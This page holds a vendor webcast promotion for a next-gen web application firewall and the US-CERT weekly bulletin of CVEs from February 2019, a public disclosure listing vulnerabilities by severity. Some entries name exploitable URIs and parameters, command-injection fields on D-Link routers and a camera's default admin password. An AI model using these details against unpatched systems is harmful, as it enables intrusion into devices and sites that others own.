Ask The Expert Webcast: Modern AppSec Tools for Modern AppSec Problems: A Practical Introduction to the Next-Gen WAF – February 19, 2019 1:00pm US/Eastern

Speakers: Kelly Brazil

Application security is undergoing a broad transformation, from the way applications are architected, developed and deployed to the ever-evolving diversity and scale of the threats they face. Driving this transformation is the growing complexity of application portfolios, which provide more engaging experiences for customers but also house increasingly more data. Simply put, legacy, rules-based web application firewalls (WAFs) like F5 and Imperva Incapsula are not equipped to keep pace with today's dynamic application and threat environments. Security teams need the right tools and strategies built for these new realities. Enter the next-gen WAF.

But what's so different about a next-gen WAF? Is it merely a buzzword? In this webcast, we will take a practical look at the next-gen WAF by showing how it differs from traditional WAFs and how it tackles some of the trickiest problems in AppSec today, including:

  • How to deliver highly accurate, real-time app protection without burdensome signatures or tuning
  • Incorporating attacker-centric techniques that match today’s threat landscape, including active interrogation and deception
  • Stopping bots and malicious automation
  • How to quickly and effectively extend security to APIs and microservice architectures
  • Building security that automatically mirrors the speed and scale of DevOps without losing control
  • Defending against website defacement attacks

Join us for this 45-minute session to see how modern AppSec tools can tackle modern AppSec problems.

SB19-049: Vulnerability Summary for the Week of February 11, 2019

Original release date: February 18, 2019 | Last revised: February 19, 2019

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
abbyy — flexicapture | Multiple SQL injection vulnerabilities in the monitoring feature in the HTTP API in ABBYY FlexiCapture before 12 Release 2 allow an attacker to execute arbitrary SQL commands via the mask, sortOrder, filter, or Order parameter. | 2019-02-09 | 7.5 | CVE-2018-13792 (CONFIRM)
aveva — indusoft_web_studio | AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. Code is executed under the program runtime privileges, which could lead to the compromise of the machine. | 2019-02-12 | 10.0 | CVE-2019-6543 (MISC, EXPLOIT-DB, MISC)
aveva — indusoft_web_studio | AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine. | 2019-02-12 | 10.0 | CVE-2019-6545 (MISC, EXPLOIT-DB, MISC)
cim_project — cim | install/install.php in CIM 0.9.3 allows remote attackers to execute arbitrary PHP code via a crafted prefix value because of configuration file mishandling in the N=83 case, as demonstrated by a call to the PHP fputs function that creates a .php file in the public folder. | 2019-02-10 | 7.5 | CVE-2019-7692 (MISC)
dlink — dir-600m_firmware | D-Link DIR-600M C1 3.04 devices allow authentication bypass via a direct request to the wan.htm page. | 2019-02-11 | 7.5 | CVE-2019-7736 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetSysLogSettings API function, as demonstrated by shell metacharacters in the IPAddress field. | 2019-02-12 | 9.0 | CVE-2019-8312 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetIPv6FirewallSettings API function, as demonstrated by shell metacharacters in the SrcIPv6AddressRangeStart field. | 2019-02-12 | 9.0 | CVE-2019-8313 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetQoSSettings API function, as demonstrated by shell metacharacters in the IPAddress field. | 2019-02-12 | 9.0 | CVE-2019-8314 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetIPv4FirewallSettings API function, as demonstrated by shell metacharacters in the SrcIPv4AddressRangeStart field. | 2019-02-12 | 9.0 | CVE-2019-8315 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetWebFilterSettings API function, as demonstrated by shell metacharacters in the WebFilterURLs field. | 2019-02-12 | 9.0 | CVE-2019-8316 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetSysEmailSettings API function, as demonstrated by shell metacharacters in the SMTPServerPort field. | 2019-02-12 | 9.0 | CVE-2019-8318 (MISC)
dlink — dir-878_firmware | An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetStaticRouteIPv4Settings API function, as demonstrated by shell metacharacters in the Gateway field. | 2019-02-12 | 9.0 | CVE-2019-8319 (MISC)
google — android | In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Use-after-free issue in heap while loading audio effects config in audio effects factory. | 2019-02-11 | 7.2 | CVE-2018-11962 (BID, CONFIRM)
google — android | In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Null pointer dereference vulnerability may occur due to missing NULL assignment in NAT module of freed pointer. | 2019-02-11 | 7.2 | CVE-2018-12014 (BID, CONFIRM)
google — android | In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Heap memory was accessed after it was freed. | 2019-02-11 | 7.2 | CVE-2018-13889 (BID, CONFIRM)
google — android | NVIDIA Tegra OpenMax driver (libnvomx) contains a vulnerability in which the software does not validate or incorrectly validates input that can affect the control flow or data flow of a program, which may lead to denial of service or escalation of privileges. Android ID: A-70857947. | 2019-02-13 | 9.3 | CVE-2018-6267 (BID, CONFIRM)
google — android | NVIDIA Tegra library contains a vulnerability in libnvmmlite_video.so, where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges. Android ID: A-80433161. | 2019-02-13 | 9.3 | CVE-2018-6268 (BID, CONFIRM)
google — android | NVIDIA Tegra OpenMax driver (libnvomx) contains a vulnerability in which the software delivers extra data with the buffer and does not properly validated the extra data, which may lead to denial of service or escalation of privileges. Android ID: A-80198474. | 2019-02-13 | 9.3 | CVE-2018-6271 (BID, CONFIRM)
google — android | In bta_ag_parse_cmer of bta_ag_cmd.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out-of-bounds write due to a missing bounds check. This could lead to remote code execution in the bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-112860487. | 2019-02-11 | 10.0 | CVE-2018-9583 (BID, CONFIRM)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. The phar:// stream wrapper can be used for objection injection attacks because there is no protection mechanism (such as the TYPO3 PHAR stream wrapper) to prevent use of the phar:// handler for non .phar-files. | 2019-02-12 | 7.5 | CVE-2019-7743 (BID, MISC)
mobotix — s14_firmware | An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. There is a default password of meinsm for the admin account. | 2019-02-09 | 10.0 | CVE-2009-5154 (MISC, MISC)
mywebsql — mywebsql | MyWebSQL 3.7 has a remote code execution (RCE) vulnerability after an attacker writes shell code into the database, and executes the Backup Database function with a .php filename for the backup’s archive file. | 2019-02-11 | 7.5 | CVE-2019-7731 (MISC)
nibbleblog — nibbleblog | Nibbleblog 4.0.5 allows eval injection by placing PHP code in the install.php username parameter and then making a content/private/shadow.php request. | 2019-02-10 | 7.5 | CVE-2019-7719 (MISC)
pocoo — jinja2 | An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the “source” parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. | 2019-02-15 | 7.5 | CVE-2019-8341 (MISC, EXPLOIT-DB)
qualcomm — mdm9206_firmware | There is potential for memory corruption in the RIL daemon due to de reference of memory outside the allocated array length in RIL in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in versions MDM9206, MDM9607, MDM9635M, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM439, SDM630, SDM660, ZZ_QCS605. | 2019-02-11 | 7.2 | CVE-2018-13888 (BID, CONFIRM)
qualcomm — mdm9607_firmware | Unauthorized access may be allowed by the SCP11 Crypto Services TA will processing commands from other TA in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile and Snapdragon Voice & Music in versions MDM9607, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 650/52, SD 820, SD 820A, SD 835, SD 8CX, SDM439, Snapdragon_High_Med_2016. | 2019-02-11 | 7.2 | CVE-2018-11888 (BID, CONFIRM)
taogogo — taocms | taocms through 2014-05-24 allows eval injection by placing PHP code in the install.php db_name parameter and then making a config.php request. | 2019-02-10 | 7.5 | CVE-2019-7720 (MISC)
traq — traq | Traq 3.7.1 allows SQL Injection via a tickets?search= URI. | 2019-02-10 | 7.5 | CVE-2018-20779 (MISC)
we-con — levistudiou | Several heap-based buffer overflow vulnerabilities in WECON LeviStudioU version 1.8.56 and prior have been identified, which may allow arbitrary code execution. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. | 2019-02-12 | 9.3 | CVE-2019-6539 (BID, MISC)
webassembly — binaryen | An assertion failure was discovered in wasm::WasmBinaryBuilder::getType() in wasm-binary.cpp in Binaryen 1.38.22. This allows remote attackers to cause a denial of service (failed assertion and crash) via a crafted wasm file. | 2019-02-09 | 7.1 | CVE-2019-7662 (MISC)

Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
abb — cp400pb_firmware | The TextEditor 2.0 in ABB CP400 Panel Builder versions 2.0.7.05 and earlier contain a vulnerability in the file parser of the Text Editor wherein the application doesn’t properly prevent the insertion of specially crafted files which could allow arbitrary code execution. | 2019-02-13 | 6.8 | CVE-2018-19008 (BID, MISC)
apache — jspwiki | A carefully crafted URL could trigger an XSS vulnerability on Apache JSPWiki, from versions up to 2.10.5, which could lead to session hijacking. | 2019-02-11 | 4.3 | CVE-2018-20242 (BID, MLIST)
atlassian — confluence | Atlassian Confluence Server and Data Center before version 6.13.1 allows an authenticated user to download a deleted page via the word export feature. | 2019-02-13 | 4.0 | CVE-2018-20237 (BID, CONFIRM)
atlassian — crowd | Various rest resources in Atlassian Crowd before version 3.2.7 and from version 3.3.0 before version 3.3.4 allow remote attackers to authenticate using an expired user session via an insufficient session expiration vulnerability. | 2019-02-13 | 5.5 | CVE-2018-20238 (BID, CONFIRM)
atto — fibrebridge_7500n_firmware | ATTO FibreBridge 7500N firmware version 2.95 is susceptible to a vulnerability which allows attackers to cause a Denial of Service (DoS). | 2019-02-12 | 5.0 | CVE-2018-5499 (CONFIRM)
axiositalia — registro_elettronico | Axios Italia Axios RE 1.7.0/7.0.0 devices have XSS via the RELogOff.aspx Error_Parameters parameter. In some situations, the XSS would be on the family.axioscloud.it cloud service; however, the vendor also supports “Sissi in Rete (con server)” for offline operation. | 2019-02-10 | 4.3 | CVE-2019-7693 (MISC, MISC)
axiosys — bento4 | An issue was discovered in Bento4 v1.5.1-627. There is an assertion failure in AP4_AtomListWriter::Action in Core/Ap4Atom.cpp, leading to a denial of service (program crash), as demonstrated by mp42hls. | 2019-02-10 | 4.3 | CVE-2019-7697 (MISC)
axiosys — bento4 | An issue was discovered in AP4_Array<AP4_CttsTableEntry>::EnsureCapacity in Core/Ap4Array.h in Bento4 1.5.1-627. Crafted MP4 input triggers an attempt at excessive memory allocation, as demonstrated by mp42hls, a related issue to CVE-2018-20095. | 2019-02-10 | 4.3 | CVE-2019-7698 (MISC)
axiosys — bento4 | A heap-based buffer over-read occurs in AP4_BitStream::WriteBytes in Codecs/Ap4BitStream.cpp in Bento4 v1.5.1-627. Remote attackers could leverage this vulnerability to cause an exception via crafted mp4 input, which leads to a denial of service. | 2019-02-10 | 4.3 | CVE-2019-7699 (MISC)
beescms — beescms | BEESCMS 4.0 has a CSRF vulnerability to add arbitrary VIP accounts via the admin/admin_member.php?action=add&nav=add_web_user&admin_p_nav=user URI. | 2019-02-15 | 6.8 | CVE-2019-8347 (MISC)
dbninja — dbninja | DbNinja 3.2.7 allows session fixation via the data.php sessid parameter. | 2019-02-11 | 6.8 | CVE-2019-7747 (MISC)
dbninja — dbninja | _includesonline.php in DbNinja 3.2.7 allows XSS via the data.php task parameter if _users/admin/tasks.php exists. | 2019-02-11 | 4.3 | CVE-2019-7748 (MISC)
elfutils_project — elfutils | In elfutils 0.175, a negative-sized memcpy is attempted in elf_cvt_note in libelf/note_xlate.h because of an incorrect overflow check. Crafted elf input causes a segmentation fault, leading to denial of service (program crash). | 2019-02-09 | 4.3 | CVE-2019-7664 (MISC)
elfutils_project — elfutils | In elfutils 0.175, a heap-based buffer over-read was discovered in the function elf32_xlatetom in elf32_xlatetom.c in libelf. A crafted ELF input can cause a segmentation fault leading to denial of service (program crash) because ebl_core_note does not reject malformed core file notes. | 2019-02-09 | 4.3 | CVE-2019-7665 (MISC, MISC)
enigmail — enigmail | Enigmail before 2.0.6 is prone to OpenPGP signatures being spoofed for arbitrary messages using a PGP/INLINE signature wrapped within a specially crafted multipart HTML email. | 2019-02-11 | 4.3 | CVE-2018-15586 (MISC)
estrongs — es_file_explorer_file_manager | The Help feature in the ES File Explorer File Manager application 4.1.9.7.4 for Android allows session hijacking by a Man-in-the-middle attacker on the local network because HTTPS is not used, and an attacker’s web site is displayed in a WebView with no information about the URL. | 2019-02-15 | 4.3 | CVE-2019-8345 (MISC)
f5 — big-ip_access_policy_manager | On BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.1.3, 12.1.0-12.1.3.7, and 11.6.0-11.6.3.2, a reflected Cross Site Scripting (XSS) vulnerability is present in an undisclosed page of the BIG-IP TMUI (Traffic Management User Interface) also known as the BIG-IP configuration utility. | 2019-02-13 | 4.3 | CVE-2019-6589 (CONFIRM)
frog_cms_project — frog_cms | Frog CMS 0.9.5 allows PHP code execution via <?php to the admin/?/layout/edit/1 URI. | 2019-02-10 | 6.5 | CVE-2018-20772 (MISC)
frog_cms_project — frog_cms | Frog CMS 0.9.5 allows PHP code execution by visiting admin/?/page/edit/1 and inserting additional <?php lines. | 2019-02-10 | 6.5 | CVE-2018-20773 (MISC)
frog_cms_project — frog_cms | admin/?/plugin/file_manager in Frog CMS 0.9.5 allows PHP code execution by creating a new .php file containing PHP code, and then visiting this file under the public/ URI. | 2019-02-10 | 6.5 | CVE-2018-20775 (MISC)
frog_cms_project — frog_cms | Frog CMS 0.9.5 provides a directory listing for a /public request. | 2019-02-10 | 5.0 | CVE-2018-20776 (MISC)
frog_cms_project — frog_cms | admin/?/plugin/file_manager in Frog CMS 0.9.5 allows XSS by creating a new file containing a crafted attribute of an IMG element. | 2019-02-10 | 4.3 | CVE-2018-20778 (MISC)
gnome — evolution | GNOME Evolution through 3.28.2 is prone to OpenPGP signatures being spoofed for arbitrary messages using a specially crafted email that contains a valid signature from the entity to be impersonated as an attachment. | 2019-02-11 | 4.3 | CVE-2018-15587 (MISC)
google — android | In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Absence of length sanity check may lead to possible stack overflow resulting in memory corruption in trustzone region. | 2019-02-11 | 4.6 | CVE-2018-12010 (CONFIRM)
google — android | In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Out of bound mask range access caused by using possible old value of msg mask table count while copying masks to userspace. | 2019-02-11 | 4.6 | CVE-2018-13893 (CONFIRM)
google — android | In package installer in Android-8.0, Android-8.1 and Android-9, there is a possible bypass of the unknown source warning due to a confused deputy scenario. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-112031362. | 2019-02-11 | 4.6 | CVE-2018-9582 (BID, CONFIRM)
google — android | In nfc_ncif_set_config_status of nfc_ncif.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-114047681. | 2019-02-11 | 4.6 | CVE-2018-9584 (BID, CONFIRM)
google — android | In nfc_ncif_proc_get_routing of nfc_ncif.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-117554809. | 2019-02-11 | 4.6 | CVE-2018-9585 (BID, CONFIRM)
google — android | In run of InstallPackageTask.java in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, it is possible that package verification is turned off and remains off due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116754444. | 2019-02-11 | 4.4 | CVE-2018-9586 (BID, CONFIRM)
google — android | In savePhotoFromUriToUri of ContactPhotoUtils.java in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is possible unauthorized access to files within the contact app due to a confused deputy scenario. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Android ID: A-113597344. | 2019-02-11 | 4.4 | CVE-2018-9587 (BID, CONFIRM)
google — android | In add_attr of sdp_discovery.c in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-115900043. | 2019-02-11 | 5.0 | CVE-2018-9590 (BID, CONFIRM)
google — android | In bta_hh_ctrl_dat_act of bta_hh_act.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116108738. | 2019-02-11 | 5.0 | CVE-2018-9591 (BID, CONFIRM)
google — android | In mca_ccb_hdl_rsp of mca_cact.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116319076. | 2019-02-11 | 5.0 | CVE-2018-9592 (BID, CONFIRM)
hotels_server_project — hotels_server | controller/fetchpwd.php and controller/doAction.php in Hotels_Server through 2018-11-05 rely on base64 in an attempt to protect password storage. | 2019-02-08 | 5.0 | CVE-2019-7648 (MISC)
housegate — house_gate | Directory traversal vulnerability in HOUSE GATE App for iOS 1.7.8 and earlier allows remote attackers to read arbitrary files via unspecified vectors. | 2019-02-13 | 5.0 | CVE-2019-5910 (JVN)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. The “No Filtering” textfilter overrides child settings in the Global Configuration. This is intended behavior. However, it might be unexpected for the user because the configuration dialog lacks an additional message to explain this. | 2019-02-12 | 4.3 | CVE-2019-7739 (BID, MISC)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. Inadequate parameter handling in JavaScript code (core.js writeDynaList) could lead to an XSS attack vector. | 2019-02-12 | 4.3 | CVE-2019-7740 (MISC)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. Inadequate checks at the Global Configuration helpurl settings allowed stored XSS. | 2019-02-12 | 4.3 | CVE-2019-7741 (MISC)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. A combination of specific web server configurations, in connection with specific file types and browser-side MIME-type sniffing, causes an XSS attack vector. | 2019-02-12 | 4.3 | CVE-2019-7742 (MISC)
joomla — joomla! | An issue was discovered in Joomla! before 3.9.3. Inadequate filtering on URL fields in various core components could lead to an XSS vulnerability. | 2019-02-12 | 4.3 | CVE-2019-7744 (MISC)
lexmark — 6500e_firmware | Certain Lexmark CX, MX, X, XC, XM, XS, and 6500e devices before 2019-02-11 allow remote attackers to erase stored shortcuts. | 2019-02-11 | 6.4 | CVE-2019-6489 (CONFIRM)
libtiff — libtiff | An Invalid Address dereference was discovered in TIFFWriteDirectoryTagTransferfunction in libtiff/tif_dirwrite.c in LibTIFF 4.0.10, affecting the cpSeparateBufToContigBuf function in tiffcp.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file. This is different from CVE-2018-12900. | 2019-02-09 | 4.3 | CVE-2019-7663 (MISC, MLIST)
linux — linux_kernel | In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. | 2019-02-15 | 5.8 | CVE-2019-6974 (MISC, MISC, MISC, MISC, MISC, MISC, MISC, EXPLOIT-DB)
live555 — streaming_media | In Live555 0.95, a setup packet can cause a memory leak leading to DoS because, when there are multiple instances of a single field (username, realm, nonce, uri, or response), only the last instance can ever be freed. | 2019-02-11 | 5.0 | CVE-2019-7732 (MISC)
live555 — streaming_media | In Live555 0.95, there is a buffer overflow via a large integer in a Content-Length HTTP header because handleRequestBytes has an unrestricted memmove. | 2019-02-11 | 5.0 | CVE-2019-7733 (MISC)
metinfo — metinfo | An issue was discovered in Metinfo 6.x. An attacker can leverage a race condition in the backend database backup function to execute arbitrary PHP code via admin/index.php?n=databack&c=index&a=dogetsql&tables=<?php and admin/databack/bakup_tables.php?2=file_put_contents URIs because app/system/databack/admin/index.class.php creates bakup_tables.php temporarily. | 2019-02-10 | 6.8 | CVE-2019-7718 (MISC)
mobotix — s14_firmware | An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. Administrator Credentials are stored in the 13-character DES hash format. | 2019-02-09 | 5.0 | CVE-2019-7673 (MISC)
mobotix — s14_firmware | An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. /admin/access accepts a request to set the “aaaaa” password, considered insecure for some use cases, from a user. | 2019-02-09 | 5.0 | CVE-2019-7674 (MISC)
mobotix — s14_firmware | An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. The default management application is delivered over cleartext HTTP with Basic Authentication, as demonstrated by the /admin/index.html URI. | 2019-02-09 | 5.0 | CVE-2019-7675 (MISC)
mywebsql — mywebsql | MyWebSQL 3.7 has a Cross-site request forgery (CSRF) vulnerability for deleting a database via the /?q=wrkfrm&type=databases URI. | 2019-02-11 | 4.9 | CVE-2019-7730 (MISC)
nasm — netwide_assembler | In Netwide Assembler (NASM) 2.14.02, there is a use-after-free in paste_tokens in asm/preproc.c. | 2019-02-15 | 6.8 | CVE-2019-8343 (MISC)
nconsulting — nc-cms | lib/NCCms.class.php in nc-cms 3.5 allows upload of .php files via the index.php?action=save name and editordata parameters. | 2019-02-10 | 5.0 | CVE-2019-7721 (MISC)
nttdocomo — v20_pro_l-01j_firmware | V20 PRO L-01J software version L01J20c and L01J20d has a NULL pointer exception flaw that can be used by an attacker to cause the device to crash on the same network range via a specially crafted access point. | 2019-02-13 | 5.7 | CVE-2019-5914 (JVN, MISC)
omron — cx-supervisor | An access of uninitialized pointer vulnerability in CX-Supervisor (Versions 3.42 and prior) could lead to type confusion when processing project files. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. | 2019-02-12 | 6.0 | CVE-2018-19018 (MISC)
qualcomm — mdm9206_firmware | While processing radio connection status change events, Radio index is not properly validated in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile and Snapdragon Voice & Music in versions MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. | 2019-02-11 | 4.6 | CVE-2018-11899 (CONFIRM)
rarlab — winrar | In WinRAR versions prior to and including 5.60, There is an out-of-bounds write vulnerability during parsing of a crafted LHA / LZH archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user. | 2019-02-12 | 6.8 | CVE-2018-20253 (MISC)
schoolcms — schoolcms | An issue was discovered in SchoolCMS 2.3.1. There is an XSS vulnerability via index.php?a=Index&c=Channel&m=Home&viewid=[XSS]. | 2019-02-13 | 4.3 | CVE-2019-8334 (MISC)
schoolcms — schoolcms | An issue was discovered in SchoolCMS 2.3.1. There is an XSS vulnerability via index.php?a=Index&c=Channel&m=Home&id=[XSS]. | 2019-02-13 | 4.3 | CVE-2019-8335 (MISC)
symantec — ghost_solution_suite | Symantec Ghost Solution Suite (GSS) versions prior to 3.3 RU1 may be susceptible to a DLL hijacking vulnerability, which is a type of issue whereby a potential attacker attempts to execute unexpected code on your machine. This occurs via placement of a potentially foreign file (DLL) that the attacker then attempts to run via a linked application. | 2019-02-08 | 6.0 | CVE-2018-18364 (BID, CONFIRM)
traq — traq | Traq 3.7.1 allows admin/users/new CSRF to create an admin account (aka group_id=1). | 2019-02-10 | 6.8 | CVE-2018-20780 (MISC)
verydows — verydows | A CSRF vulnerability was found in Verydows v2.0 that can add an admin account via index.php?m=backend&c=admin&a=add&step=submit. | 2019-02-11 | 6.8 | CVE-2019-7737 (MISC)
verydows — verydows | Verydows 2.0 has XSS via the index.php?m=api&c=stats&a=count referrer parameter. | 2019-02-12 | 4.3 | CVE-2019-7753 (MISC)
we-con — levistudiou | A memory corruption vulnerability has been identified in WECON LeviStudioU version 1.8.56 and prior, which may allow arbitrary code execution. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. | 2019-02-12 | 6.8 | CVE-2019-6541 (BID, MISC)
webassembly — binaryen | A heap-based buffer over-read was discovered in wasm::WasmBinaryBuilder::visitCall in wasm-binary.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm-merge. | 2019-02-10 | 4.3 | CVE-2019-7700 (MISC)
webassembly — binaryen | A heap-based buffer over-read was discovered in wasm::SExpressionParser::skipWhitespace() in wasm-s-parser.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm2js. | 2019-02-10 | 4.3 | CVE-2019-7701 (MISC)
webassembly — binaryen | A NULL pointer dereference was discovered in wasm::SExpressionWasmBuilder::parseExpression in wasm-s-parser.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm-as. | 2019-02-10 | 4.3 | CVE-2019-7702 (MISC)
webassembly — binaryen | In Binaryen 1.38.22, there is a use-after-free problem in wasm::WasmBinaryBuilder::visitCall in wasm-binary.cpp. Remote attackers could leverage this vulnerability to cause a denial-of-service via a wasm file, as demonstrated by wasm-merge. | 2019-02-10 | 4.3 | CVE-2019-7703 (MISC)
webassembly — binaryen | wasm::WasmBinaryBuilder::readUserSection in wasm-binary.cpp in Binaryen 1.38.22 triggers an attempt at excessive memory allocation, as demonstrated by wasm-merge and wasm-opt. | 2019-02-10 | 4.3 | CVE-2019-7704 (MISC)

Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
